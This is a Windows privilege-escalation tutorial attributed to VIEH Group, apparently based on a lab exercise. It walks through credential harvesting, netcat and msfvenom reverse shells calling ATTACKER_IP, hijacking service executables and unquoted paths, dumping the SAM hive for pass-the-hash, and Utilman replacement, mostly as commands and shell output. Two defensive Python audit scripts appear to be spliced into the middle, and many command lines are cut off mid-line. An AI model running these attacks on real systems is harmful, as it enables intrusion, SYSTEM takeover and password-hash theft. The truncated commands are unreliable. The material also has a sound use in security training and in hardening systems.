Windows Privilege Escalation

Uploaded by

mamaslittleboy20

A Document series by VIEH Group

Windows Privilege Escalation
Getting into the Windows OS

Disclaimer
Dear readers,
This document is provided by VIEH Group for educational purposes
only. While we strive for accuracy and reliability, we make no
warranties or representations regarding the completeness, accuracy, or
usefulness of the information presented herein. Any reliance you place
on this document is at your own risk. VIEH Group shall not be liable
for any damages arising from the use of or reliance on this document.
We acknowledge and appreciate the contribution of the source person.

Also, this document was not created by a professional content writer, so any
mistakes and errors are part of the great design.

Happy learning !!!

This document is credited to an unknown person (who can mail us for credits), whose
exceptional insights elevate its value. Their contribution is deeply appreciated,
underscoring their significant role in its creation.

Our newsletter: Cyber Arjun


Social Media: @viehgroup viehgroup.com [email protected]


Windows Priv Escalation
Windows Users
Windows systems mainly have two kinds of users. Depending on their access levels, we can
categorise a user in one of the following groups:

Administrator: These users have the most privileges. They can change any system configuration
parameter and access any file in the system.

Standard User: These users can access the computer but only perform limited tasks. Typically
these users can not make permanent or essential changes to the system and are limited to
their own files.

SYSTEM / LocalSystem

An account used by the operating system to perform internal tasks. It has full access to
all files and resources available on the host with even higher privileges than
administrators.
Local Service

Default account used to run Windows services with "minimum" privileges. It will use
anonymous connections over the network.
Network Service

Default account used to run Windows services with "minimum" privileges. It will use the
computer credentials to authenticate through the network.

Harvesting Passwords from Usual Spots

Unattended Windows Installations
Places to Search for Passwords are:

C:\Unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml

PowerShell History
The PowerShell command history can be read from cmd.exe using this command:

type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShe

Note: The command above will only work from cmd.exe, as PowerShell won't recognize
%userprofile% as an environment variable. To read the file from PowerShell, you'd have to
replace %userprofile% with $Env:userprofile.

Saved Windows Credentials


The command below will list saved credentials:

cmdkey /list

While you can't see the actual passwords, if you notice any credentials worth trying,
you can use them with the runas command and the /savecred option, as seen below.

runas /savecred /user:admin cmd.exe

IIS Configuration
C:\inetpub\wwwroot\web.config

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config

Here is a quick way to find database connection strings in the file:

type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\w

Retrieve Credentials from Software: PuTTY


To retrieve the stored proxy credentials, you can search under the following registry key
for ProxyPassword with the following command:

reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessio

Scheduled Tasks
Looking into scheduled tasks on the target system, you may see a scheduled task that
either lost its binary or it's using a binary you can modify.

Scheduled tasks can be listed from the command line using the schtasks command without any
options. To retrieve detailed information about a specific task, query it by name, as below:

schtasks /query /tn vulntask /fo list /v

Note the "Task to Run" parameter, which indicates what gets executed by the scheduled task, and
the "Run As User" parameter, which shows the user that will be used to execute the task.

To check the file permissions on the executable, we use icacls

icacls c:\tasks\schtask.bat

If our current user can modify or overwrite the "Task to Run" executable, we can place a
netcat reverse shell there.

C:\> icacls c:\tasks\schtask.bat
c:\tasks\schtask.bat NT AUTHORITY\SYSTEM:(I)(F)
                     BUILTIN\Administrators:(I)(F)
                     BUILTIN\Users:(I)(F)

Here BUILTIN\Users has Full (F) permission, so let's change the .bat file to execute a reverse shell.

echo c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4444 > C:\tasks

Finally, just run the task as our user:

schtasks /run /tn vulntask

AlwaysInstallElevated
Windows installer files (also known as .msi files) are used to install applications on the
system. They usually run with the privilege level of the user that starts them. However, they can
be configured to run with higher privileges from any user account (even unprivileged ones).
This could potentially allow us to generate a malicious MSI file that would run with admin
privileges.

Note: The AlwaysInstallElevated method won't work on this
room's machine and it's included as information only.

This method requires two registry values to be set. You can query these from the command
line using the commands below.

C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Insta
C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Insta

To be able to exploit this vulnerability, both should be set. Otherwise, exploitation will not be
possible. If these are set, you can generate a malicious .msi file using msfvenom, as seen
below:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKING_10.

As this is a reverse shell, you should also run the Metasploit Handler module configured
accordingly. Once you have transferred the file you have created, you can run the installer
with the command below and receive the reverse shell:

C:\> msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi

Abusing Service Misconfigurations


Windows Services
Windows services are managed by the Service Control Manager (SCM). Every service has an
executable assigned to it, and the service's Discretionary Access Control List (DACL)
decides who may start, stop, restart, query the configuration of, or reconfigure the service,
so whether we can change a service depends on what its DACL grants us.

Querying a service, we can see that the associated executable is specified through the
BINARY_PATH_NAME parameter, and the account used to run the service is shown in the
SERVICE_START_NAME parameter:

C:\> sc qc apphostsvc
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: apphostsvc
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Windows\system32\svchost.ex
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Application Host Helper Servic
DEPENDENCIES :
SERVICE_START_NAME : localSystem

All of the services configurations are stored on the registry under

HKLM\SYSTEM\CurrentControlSet\Services\<service_name>

A subkey exists for every service in the system. Again, we can see the associated
executable on the ImagePath value and the account used to start the service on the
ObjectName value. If a DACL has been configured for the service, it will be stored in a
subkey called Security. As you have guessed by now, only administrators can modify
such registry entries by default.

Insecure Permissions on Service Executable
Insecure Permissions on Service Executable
If the executable associated with a service has weak permissions that allow an
attacker to modify or replace it, the attacker can gain the privileges of the service's
account trivially.

Query the service configuration using sc:

C:\> sc qc WindowsScheduler
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: windowsscheduler
TYPE : 10 WIN32_OWN_PR
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\PROGRA~2\SYST
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : System Scheduler
DEPENDENCIES :
SERVICE_START_NAME : .\svcuser1

The executable in the result is C:\PROGRA~2\SYSTEM~1\WService.exe. This means it will be
executed whenever the service runs.

Let's see if we can modify this exe to run a netcat reverse shell by editing it.
To check the permissions on any file we use icacls:

C:\Users\thm-unpriv>icacls C:\PROGRA~2\SYSTEM
C:\PROGRA~2\SYSTEM~1\WService.exe Everyone:(I
NT AUTHORIT BUILTIN\Adm BUILTIN\Use
APPLICATION APPLICATION

Successfully processed 1 files; Failed proces

As we see here, Everyone has permission to Modify (M).

Let's modify this exe into a reverse shell 🙂

First, create an exe file using msfvenom and upload it to the machine with wget.
Attacker Machine

user@attackerpc$ msfvenom -p windows/x64/shel

user@attackerpc$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0

Victim Machine

wget http://ATTACKER_IP:8000/rev-svc.exe -O r

Now move the file into place and give full permission to Everyone.

Since another user will execute our payload, we need to grant full permissions to the
Everyone group.
Victim Machine

C:\> cd C:\PROGRA~2\SYSTEM~1\

C:\PROGRA~2\SYSTEM~1> move WService.exe
WServ 1 file(s) moved.

C:\PROGRA~2\SYSTEM~1> move C:\Users\thm-
unpri 1 file(s) moved.

C:\PROGRA~2\SYSTEM~1> icacls WService.exe /gr
Successfully processed 1 files.

Attacker machine

user@attackerpc$ nc -lvp 4445

Finally, restart the service to execute the reverse shell exe we created:

C:\> sc stop windowsscheduler
C:\> sc start windowsscheduler

Booooooommmmmmmmmmm

user@attackerpc$ nc -lvp 4445
Listening on 0.0.0.0 4445
Connection received on 10.10.175.90 50649
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights re

C:\Windows\system32>whoami
wprivesc1\svcusr1

GOOOOOOOOOOOOOT THEEEEEEEEEE
SHELLLLLLLLLLLLLLLLLLLLL

POC:::::::

Unquoted Service Paths
When we can't directly write into service executables as before, there might still be a
chance to force a service into running arbitrary executables by using a rather obscure
feature.

In such attacks we can manipulate the system into executing another binary because of an
unquoted path assigned to the executable to be executed.

Example:
Here is a service with a quoted path (secure):

C:\> sc qc "vncserver"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: vncserver
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : "C:\Program Files\RealVNC\VNC
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : VNC Server
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

Here "C:\Program Files\RealVNC\VNC Server\vncserver.exe" is enclosed in double quotes, so
the SCM will take the whole string as one path.

And here is an example of an unsecured path:

C:\> sc qc "disk sorter enterprise"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: disk sorter enterprise
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\MyPrograms\Disk Sorter Ente
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Disk Sorter Enterprise
DEPENDENCIES :
SERVICE_START_NAME : .\svcusr2

Here C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe is not enclosed in quotes, so we
can hijack the binary by placing a file earlier in the path. It works like this:

The SCM tries to execute the exe file, but there is one problem: whenever there are spaces in
the path, for example when the executable lives in a folder named 'Service Server Files', the
SCM cannot tell where the executable name ends and is left with multiple candidates to try,
which a user can manipulate to make it execute a malicious exe and get a shell.

It works in this way:

Let's understand it with my example. Imagine you are reading a path from the start, letter
by letter, and when you reach an empty space you stop, because you can't tell whether the
name has ended. The same happens here: at each space the SCM first tries what it has read so
far as the executable name, and only then goes on reading the rest of the directory name.

If we have write permission to the directory, what if we manipulate this by creating another
entry in the same path, matching the sequence before the real executable is reached?
Yes!! Our exe will run as the service.
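The lookup described above, as an added example that is not part of the original document: a Python audit helper that extracts BINARY_PATH_NAME from `sc qc` output, lists the candidate executables the SCM (through CreateProcess) tries at each space before reaching the real one, and produces the quoted path that fixes it. The function names and the sample `sc qc` output are mine; the rule of trying each space-delimited prefix and appending .exe to a name without an extension is assumed from the documented CreateProcess behaviour.

```python
"""Audit helper: spot unquoted service image paths and what the SCM would try to run."""
import re


def binary_path_from_sc_qc(sc_output):
    """Extract the BINARY_PATH_NAME value from `sc qc <service>` output (None if absent)."""
    m = re.search(r"BINARY_PATH_NAME\s*:\s*(.+)", sc_output)
    return m.group(1).strip() if m else None


def image_candidates(binary_path):
    """Executables tried, in order, for an unquoted image path; [] when it is quoted.

    Assumed CreateProcess rule: at each space the text read so far is tried as
    the image name, with .exe appended when that name has no extension; the
    search stops at the first candidate ending in .exe, the intended image."""
    path = binary_path.strip()
    if path.startswith('"'):          # quoted: the SCM takes the quoted text as one path
        return []
    tokens = path.split(" ")
    candidates = []
    for i in range(1, len(tokens) + 1):
        prefix = " ".join(tokens[:i])
        name = prefix.rsplit("\\", 1)[-1]
        candidates.append(prefix if "." in name else prefix + ".exe")
        if prefix.lower().endswith(".exe"):
            break
    return candidates


def is_unquoted_path_risk(binary_path):
    """True when a spurious candidate would be tried before the real executable."""
    return len(image_candidates(binary_path)) > 1


def directories_to_lock_down(binary_path):
    """Parent directories of the spurious candidates; non-admins must not write here."""
    dirs = []
    for cand in image_candidates(binary_path)[:-1]:
        parent = cand.rsplit("\\", 1)[0]
        parent = parent + "\\" if parent.endswith(":") else parent   # keep "C:\" whole
        if parent not in dirs:
            dirs.append(parent)
    return dirs


def quoted_image_path(binary_path):
    """The remediation: the same path wrapped in double quotes."""
    path = binary_path.strip()
    return path if path.startswith('"') else '"' + path + '"'


def sc_config_command(service_name, binary_path):
    """`sc config` line applying the fix; the inner quotes are backslash-escaped for sc.exe."""
    inner = quoted_image_path(binary_path).replace('"', '\\"')
    return 'sc config "%s" binPath= "%s"' % (service_name, inner)


# Constructed `sc qc` output modelled on the Disk Sorter example in this document.
SAMPLE_SC_QC = r"""[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: disk sorter enterprise
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe
        SERVICE_START_NAME : .\svcusr2
"""

if __name__ == "__main__":
    image = binary_path_from_sc_qc(SAMPLE_SC_QC)
    print("risk:", is_unquoted_path_risk(image), image_candidates(image))
    print(sc_config_command("disk sorter enterprise", image))
```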

Let's do it in practice.

Let's start by checking the permissions on that directory:

C:\>icacls c:\MyPrograms
c:\MyPrograms NT AUTHORITY\SYSTEM:(I)(OI)
              BUILTIN\Administrators:(I)(
              BUILTIN\Users:(I)(OI)(CI)(R
              BUILTIN\Users:(I)(CI)(AD)
              BUILTIN\Users:(I)(CI)(WD)
              CREATOR OWNER:(I)(OI)(CI)(I

Successfully processed 1 files; Failed pr

The BUILTIN\Users group has AD and WD permissions.

Since Users have AD and WD here, we can create subdirectories and files in this directory.
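As an added example (not code from the original document), here is a small Python parser for icacls output that flags ACEs granting write-capable rights to Everyone, BUILTIN\Users or other broad groups; this is the check run by hand above on schtask.bat, on WService.exe and on c:\MyPrograms. The sample outputs are constructed from the ones in this write-up, and the parser assumes the object path on the first line contains no spaces (icacls prints it unquoted).

```python
"""Audit helper: flag icacls ACEs that let broad groups modify a file or directory."""
import re

# Simple rights (F, M, W, D) and specific rights that permit changes:
# WD = write data / add file, AD = append data / add subdirectory,
# DC = delete child, WDAC = write DACL, WO = write owner.
WRITE_RIGHTS = {"F", "M", "W", "D", "WD", "AD", "WA", "WEA", "DC", "WDAC", "WO", "GA", "GW"}
# Inheritance flags share the parentheses with rights but grant nothing.
INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}
# Principals every local account effectively belongs to.
BROAD_PRINCIPALS = {"everyone", "builtin\\users", "users", "authenticated users",
                    "nt authority\\authenticated users", "nt authority\\interactive"}

PATH_RE = re.compile(r"^([A-Za-z]:\\\S*)\s+(.*)$")        # "<path> <first ACE>"
ACE_RE = re.compile(r"^([^:()]+?):((?:\([^)]*\))+)\s*$")   # "<principal>:(flags)(rights)"


def parse_icacls(output):
    """Return [(path, principal, rights_set)] for every ACE in icacls text output."""
    aces, path = [], None
    for line in output.splitlines():
        text = line.strip()
        if not text or text.startswith("Successfully processed"):
            continue
        m = PATH_RE.match(text)
        if m:                                  # first line of an entry carries the path
            path, text = m.group(1), m.group(2)
        ace = ACE_RE.match(text)
        if not ace:
            continue
        groups = re.findall(r"\(([^)]*)\)", ace.group(2))
        rights = {r.strip() for g in groups for r in g.split(",")} - INHERIT_FLAGS - {""}
        aces.append((path, ace.group(1).strip(), rights))
    return aces


def writable_by_broad_principals(output):
    """Return [(path, principal, sorted_rights)] where a broad group can modify the object."""
    findings = []
    for path, principal, rights in parse_icacls(output):
        risky = rights & WRITE_RIGHTS
        if principal.lower() in BROAD_PRINCIPALS and risky:
            findings.append((path, principal, sorted(risky)))
    return findings


# Constructed samples modelled on the three icacls listings in this document.
SAMPLE_SCHTASK = r"""c:\tasks\schtask.bat NT AUTHORITY\SYSTEM:(I)(F)
                     BUILTIN\Administrators:(I)(F)
                     BUILTIN\Users:(I)(F)

Successfully processed 1 files; Failed processing 0 files
"""
SAMPLE_WSERVICE = r"""C:\PROGRA~2\SYSTEM~1\WService.exe Everyone:(I)(M)
                                  NT AUTHORITY\SYSTEM:(I)(F)
                                  BUILTIN\Administrators:(I)(F)
                                  BUILTIN\Users:(I)(RX)
"""
SAMPLE_MYPROGRAMS = r"""c:\MyPrograms NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
              BUILTIN\Administrators:(I)(OI)(CI)(F)
              BUILTIN\Users:(I)(OI)(CI)(RX)
              BUILTIN\Users:(I)(CI)(AD)
              BUILTIN\Users:(I)(CI)(WD)
              CREATOR OWNER:(I)(OI)(CI)(IO)(F)
"""

if __name__ == "__main__":
    for sample in (SAMPLE_SCHTASK, SAMPLE_WSERVICE, SAMPLE_MYPROGRAMS):
        for path, who, rights in writable_by_broad_principals(sample):
            print("%s: %s can %s" % (path, who, ",".join(rights)))
```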

Let's build a reverse shell with msfvenom and place it on the file system:

user@attackerpc$ msfvenom -p windows/x64/

user@attackerpc$ nc -lvp 4446

Now let's move the exe into the path. This is the important step: we have to place our binary
where the SCM will find it before it reaches the real service exe directory.

C:\> move C:\Users\thm-unpriv\rev-svc2.ex

C:\> icacls C:\MyPrograms\Disk.exe /grant
Successfully processed 1 files.

Also grant permissions so other users can execute it.

Restart the service:

C:\> sc stop "disk sorter enterprise"
C:\> sc start "disk sorter enterprise"

BOOM Shell <3

user@attackerpc$ nc -lvp 4446
Listening on 0.0.0.0 4446
Connection received on 10.10.175.90 50650
Microsoft Windows [Version 10.0.17763.182
(c) 2018 Microsoft Corporation. All right

C:\Windows\system32>whoami
wprivesc1\svcusr2

POCCCCCCCCC

Insecure Service Permissions
What if we have permission to edit the configuration of the service?
Then we can point the executable to any file we want !! Simple As Fuck <3
Let's do it in practice.
To find out whether the user is allowed to edit the service configuration, we use a utility
known as AccessChk.
Link to AccessChk: https://learn.microsoft.com/en-us/sysinternals/downloads/accesschk

Let's first check the permissions on the service:

C:\tools\AccessChk> accesschk64.exe -qlc thms
  [0] ACCESS_ALLOWED_ACE_TYPE: NT AUTHORITY\S
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
        SERVICE_INTERROGATE
        SERVICE_ENUMERATE_DEPENDENTS
        SERVICE_PAUSE_CONTINUE
        SERVICE_START
        SERVICE_STOP
        SERVICE_USER_DEFINED_CONTROL
        READ_CONTROL
  [4] ACCESS_ALLOWED_ACE_TYPE: BUILTIN\Users
        SERVICE_ALL_ACCESS

We see here that the Users group has all access to the service, so we are allowed to
reconfigure it. Let's create a reverse shell for this:

user@attackerpc$ msfvenom -p windows/x64/shel

user@attackerpc$ python3 -m http.server

Give permission to other users too:

C:\> icacls C:\Users\thm-unpriv\rev-svc3.exe

Now Edit the Service Config To Execute this binary:

C:\> sc config THMService binPath= "C:\Users\

Stop and Restart the service and Get the Shell 🙂


POCCCCCC???

Abusing dangerous privileges

Privileges are rights to perform a task; for example, you are not allowed to rearrange your
bed the way you want because your mom doesn't allow it ;) Joke apart, a privilege is the
right to perform a given task. In Windows, a user's privileges can be listed with this command:

whoami /priv

Read about Perm here :

SeBackup / SeRestore

The SeBackup and SeRestore privileges allow users to read and write to any file in the
system, ignoring any DACL.

Let's see the privileges of this user:

C:\Windows\system32>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description
============================= ===============
SeBackupPrivilege             Back up files a
SeRestorePrivilege            Restore files a
SeShutdownPrivilege           Shut down the s
SeChangeNotifyPrivilege       Bypass traverse
SeIncreaseWorkingSetPrivilege Increase a proc

C:\Windows\system32>

As we see, we have the SeBackup/SeRestore privileges.
We can use these to copy the SAM and SYSTEM hives, which hold the password hashes.
Let's do it in practice.

To copy both hives we use these commands:

C:\> reg save hklm\system C:\Users\THMBackup\
The operation completed successfully.

C:\> reg save hklm\sam C:\Users\THMBackup\sam
The operation completed successfully.

Now it's time to copy these to our main host (Kali Linux). We can use any method; here we
are using Impacket's smbserver:

mkdir share
impacket-smbserver -smb2support -username THM

And use impacket to retrieve the users' password hashes:

impacket-secretsdump -sam sam.hive -system sy
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Target system bootKey: 0x36c8d26ec0df8b23
[*] Dumping local SAM hashes (uid:rid:lmhash:
Administrator:500:aad3b435b51404eeaad3b435b51
Guest:501:aad3b435b51404eeaad3b435b51404ee:31
DefaultAccount:503:aad3b435b51404eeaad3b435b5
WDAGUtilityAccount:504:aad3b435b51404eeaad3b4
THMBackup:1008:aad3b435b51404eeaad3b435b51404
THMTakeOwnership:1009:aad3b435b51404eeaad3b43
[*] Cleaning up...

We can finally use the Administrator's hash to perform a Pass-the-Hash attack and gain
access to the target machine with SYSTEM privileges:

impacket-psexec -hashes aad3b435b51404eeaad3b
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Requesting shares on 10.10.175.89.....
[*] Found writable share ADMIN$
[*] Uploading file WXhqNyDV.exe
[*] Opening SVCManager on 10.10.175.89.....
[*] Creating service XFMB on 10.10.175.89....
[*] Starting service XFMB.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights re

C:\Windows\system32>

GOTTTTTTTTT THE SHELLLLLLL 🙂

POCCCCCCCCCC:

SeTakeOwnership
The SeTakeOwnership privilege allows a user to take ownership of any object on the
system, including files and registry keys, opening up many possibilities for an
attacker to elevate privileges

Let's first see the privileges assigned to this user:

C:\Windows\system32>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description
============================= ===============
SeTakeOwnershipPrivilege      Take ownership
SeChangeNotifyPrivilege       Bypass traverse
SeIncreaseWorkingSetPrivilege Increase a proc

C:\Windows\system32>

Now, as we see, the SeTakeOwnershipPrivilege is granted, which means we can change the
owner of files and objects.

We'll abuse utilman.exe to escalate privileges this time. Utilman is a built-in Windows
application used to provide Ease of Access options on the lock screen.
Let's start by taking ownership of this exe:

C:\Windows\system32>takeown /f C:\Windows\Sys
SUCCESS: The file (or folder): "C:\Windows\Sy

C:\Windows\system32>

Now that we are the owner, let's give ourselves full permission to edit this file:

C:\Windows\system32>icacls C:\Windows\System3
processed file: C:\Windows\System32\Utilman.e
Successfully processed 1 files; Failed proces

C:\Windows\system32>

Now let's replace it with cmd.exe. Since Utilman is started by the SYSTEM user, our cmd.exe
will be executed by SYSTEM, giving us full privileges:

C:\Windows\system32>copy Utilman.exe cmd.exe
Overwrite cmd.exe? (Yes/No/All): All
Access is denied.
        0 file(s) copied.

C:\Windows\system32>

Now let's run Utilman. For this we need to lock the screen and launch it from the Ease of
Access button on the lock screen 😒

SeImpersonate / SeAssignPrimaryToken

These privileges allow a process to impersonate other users and act on their behalf.

To use RogueWinRM, we first need to upload the exploit to the
target machine. For your convenience, this has already been done,
and you can find the exploit in the C:\tools\ folder.
The RogueWinRM exploit is possible because whenever a user
(including unprivileged users) starts the BITS service in Windows, it
automatically creates a connection to port 5985 using SYSTEM
privileges. Port 5985 is typically used for the WinRM service, which
is simply a port that exposes a Powershell console to be used
remotely through the network. Think of it like SSH, but using
Powershell.

If, for some reason, the WinRM service isn't running on the victim
server, an attacker can start a fake WinRM service on port 5985 and
catch the authentication attempt made by the BITS service when
starting. If the attacker has SeImpersonate privileges, he can execute
any command on behalf of the connecting user, which is SYSTEM.
Before running the exploit, we'll start a netcat listener to receive a
reverse shell on our attacker's machine:

c:\tools\RogueWinRM\RogueWinRM.exe -p "C:\too

Now we just need to listen on port 4442.

Abusing vulnerable software


Outdated software has multiple vulnerabilities, and some of them even allow a user to
escalate privileges to the SYSTEM user.

You can use the wmic tool to list software installed on the target
system and its versions.

wmic product get name,version,vendor

Thank you for taking the time to read through our publication. Your
continued support is invaluable.

Jai Hind!
